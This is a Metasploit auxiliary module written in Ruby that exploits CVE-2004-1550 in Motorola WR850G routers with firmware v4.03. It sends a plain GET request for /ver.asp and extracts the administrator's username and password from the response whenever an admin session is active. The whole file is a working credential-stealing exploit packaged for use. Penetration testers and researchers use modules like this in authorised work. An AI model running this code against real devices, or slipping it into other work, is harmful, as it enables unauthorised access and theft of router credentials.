1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Motorola WR850G v4.03 Credentials',
14
        'Description' => %q{
15
          Login credentials to the Motorola WR850G router with
16
          firmware v4.03 can be obtained via a simple GET request
17
          if issued while the administrator is logged in.  A lot
18
          more information is available through this request, but
19
          you can get it all and more after logging in.
20
        },
21
        'Author' => 'kris katterjohn',
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          [ 'CVE', '2004-1550' ],
25
          [ 'OSVDB', '10232' ],
26
          [ 'URL', 'https://seclists.org/bugtraq/2004/Sep/0339.html'],
27
        ],
28
        'DisclosureDate' => '2004-09-24',
29
        'Notes' => {
30
          'Stability' => [CRASH_SAFE],
31
          'SideEffects' => [],
32
          'Reliability' => []
33
        }
34
      )
35
    )
36

37
    register_options([
38
      Opt::RPORT(80)
39
    ])
40
  end
41

42
  def run
43
    connect
44

45
    sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
46
    response = sock.get_once
47

48
    disconnect
49

50
    if response.nil? || response.empty?
51
      print_status('No response from server')
52
      return
53
    end
54

55
    # 302 Redirect
56
    if response.split("\r\n")[0] !~ /200 Ok/
57
      print_status('Administrator not logged in')
58
      return
59
    end
60

61
    user = ::Regexp.last_match(1) if response.match("http_username=([^\n]*)<br>")
62
    pass = ::Regexp.last_match(1) if response.match("http_passwd=([^\n]*)<br>")
63

64
    print_status("Found username \"#{user}\" and password \"#{pass}\"") if user && pass
65
  end
66
end
67

68